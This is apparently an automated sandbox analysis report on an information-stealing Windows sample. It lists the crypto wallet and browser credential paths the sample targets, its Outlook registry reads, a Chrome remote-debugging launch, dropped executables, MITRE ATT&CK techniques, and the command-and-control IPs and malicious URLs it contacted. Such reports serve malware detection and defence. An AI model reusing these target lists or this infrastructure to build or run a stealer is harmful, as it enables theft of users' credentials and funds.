Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ATCVA5TXuser\AppData\Roaming\\MultiDoge\\multidoge.wallet
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16ontdesk\AppData\Roaming\Electrum-LTC\wallets\*.*
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                      Source: Yara matchFile source: 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1825004684.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: Yara matchFile source: 00000002.00000003.1306919815.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1825004684.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF30C40 sqlite3_bind_zeroblob,2_2_6CF30C40
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF30D60 sqlite3_bind_parameter_name,2_2_6CF30D60
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE58EA0 sqlite3_clear_bindings,2_2_6CE58EA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6CF30B40
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE56410 bind,WSAGetLastError,2_2_6CE56410
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE560B0 listen,WSAGetLastError,2_2_6CE560B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE56070 PR_Listen,2_2_6CE56070
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE5C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6CE5C050
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE5C030 sqlite3_bind_parameter_count,2_2_6CE5C030
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CDE22D0 sqlite3_bind_blob,2_2_6CDE22D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE563C0 PR_Bind,2_2_6CE563C0
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Extra Window Memory Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
                      Process Injection
                      3
                      Obfuscated Files or Information
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Remote Access Software
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Scheduled Task/Job
                      12
                      Software Packing
                      NTDS237
                      System Information Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets11
                      Query Registry
                      SSHKeylogging114
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Extra Window Memory Injection
                      Cached Domain Credentials651
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                      Masquerading
                      DCSync2
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                      Virtualization/Sandbox Evasion
                      Proc Filesystem241
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563633 Sample: file.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 64 script.irisstealer.xyz 2->64 66 store1.gofile.io 2->66 68 file4.gofile.io 2->68 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Antivirus detection for URL or domain 2->102 106 10 other signatures 2->106 9 file.exe 37 2->9         started        14 skotes.exe 2->14         started        16 skotes.exe 2->16         started        18 msedge.exe 66 627 2->18         started        signatures3 104 Performs DNS queries to domains with low reputation 64->104 process4 dnsIp5 70 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 9->70 72 185.215.113.206, 49706, 49755, 49785 WHOLESALECONNECTIONSNL Portugal 9->72 74 127.0.0.1 unknown unknown 9->74 52 C:\Users\user\DocumentsGDHDHJEBGH.exe, PE32 9->52 dropped 54 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 9->54 dropped 56 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->56 dropped 62 11 other files (none is malicious) 9->62 dropped 118 Detected unpacking (changes PE section rights) 9->118 120 Attempt to bypass Chrome Application-Bound Encryption 9->120 122 Drops PE files to the document folder of the user 9->122 134 8 other signatures 9->134 20 cmd.exe 9->20         started        22 msedge.exe 2 11 9->22         started        25 chrome.exe 9->25         started        124 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->124 126 Tries to evade debugger and weak emulator (self modifying code) 14->126 128 Hides threads from debuggers 14->128 76 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 16->76 78 file4.gofile.io 45.112.123.225 AMAZON-02US Singapore 16->78 80 store1.gofile.io 45.112.123.227 AMAZON-02US Singapore 16->80 58 C:\Users\user\AppData\Local\...\knotc.exe, PE32+ 16->58 dropped 60 C:\Users\user\AppData\Local\...\knotc[1].exe, PE32+ 16->60 dropped 130 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->130 132 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->132 28 msedge.exe 18->28         started        30 msedge.exe 18->30         started        32 msedge.exe 18->32         started        34 msedge.exe 18->34         started        file6 signatures7 process8 dnsIp9 36 DocumentsGDHDHJEBGH.exe 20->36         started        40 conhost.exe 20->40         started        116 Monitors registry run keys for changes 22->116 42 msedge.exe 22->42         started        82 192.168.2.7, 443, 49705, 49706 unknown unknown 25->82 84 239.255.255.250 unknown Reserved 25->84 44 chrome.exe 25->44         started        86 sb.scorecardresearch.com 18.165.220.110, 443, 49822 MIT-GATEWAYSUS United States 28->86 88 13.107.246.40 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->88 90 25 other IPs or domains 28->90 signatures10 process11 dnsIp12 50 C:\Users\user\AppData\Local\...\skotes.exe, PE32 36->50 dropped 108 Detected unpacking (changes PE section rights) 36->108 110 Tries to evade debugger and weak emulator (self modifying code) 36->110 112 Tries to detect virtualization through RDTSC time measurements 36->112 114 4 other signatures 36->114 47 skotes.exe 36->47         started        92 www.google.com 142.250.181.68, 443, 49724, 49727 GOOGLEUS United States 44->92 94 plus.l.google.com 172.217.17.78, 443, 49761 GOOGLEUS United States 44->94 96 2 other IPs or domains 44->96 file13 signatures14 process15 signatures16 136 Hides threads from debuggers 47->136 138 Tries to detect sandboxes / dynamic malware analysis system (registry check) 47->138 140 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 47->140

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe47%ReversingLabsWin32.Trojan.Generic
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\knotc[1].exe5%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1009551001\knotc.exe5%ReversingLabs
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      l-0007.l-dc-msedge.net0%VirustotalBrowse
                      script.irisstealer.xyz0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://185.215.113.206rontdesk0%Avira URL Cloudsafe
                      http://185.215.113.206/c4becf79229cb002.php9)100%Avira URL Cloudmalware
                      http://185.215.113.206/c4becf79229cb002.phpnb100%Avira URL Cloudmalware
                      http://185.215.113.206/68b591d6548ec281/msvcp140.dll&100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      chrome.cloudflare-dns.com
                      172.64.41.3
                      truefalse
                        high
                        file4.gofile.io
                        45.112.123.225
                        truefalse
                          high
                          l-0007.l-dc-msedge.net
                          13.107.43.16
                          truefalseunknown
                          plus.l.google.com
                          172.217.17.78
                          truefalse
                            high
                            play.google.com
                            172.217.19.206
                            truefalse
                              high
                              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                              94.245.104.56
                              truefalse
                                high
                                sb.scorecardresearch.com
                                18.165.220.110
                                truefalse
                                  high
                                  script.irisstealer.xyz
                                  172.67.142.108
                                  truetrueunknown
                                  www.google.com
                                  142.250.181.68
                                  truefalse
                                    high
                                    s-part-0035.t-0009.t-msedge.net
                                    13.107.246.63
                                    truefalse
                                      high
                                      store1.gofile.io
                                      45.112.123.227
                                      truefalse
                                        high
                                        googlehosted.l.googleusercontent.com
                                        172.217.19.225
                                        truefalse
                                          high
                                          assets.msn.com
                                          unknown
                                          unknownfalse
                                            high
                                            c.msn.com
                                            unknown
                                            unknownfalse
                                              high
                                              ntp.msn.com
                                              unknown
                                              unknownfalse
                                                high
                                                clients2.googleusercontent.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  bzib.nelreports.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    apis.google.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      api.msn.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://185.215.113.206/68b591d6548ec281/softokn3.dllfalse
                                                          high
                                                          http://185.215.113.206/false
                                                            high
                                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700975139&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                              high
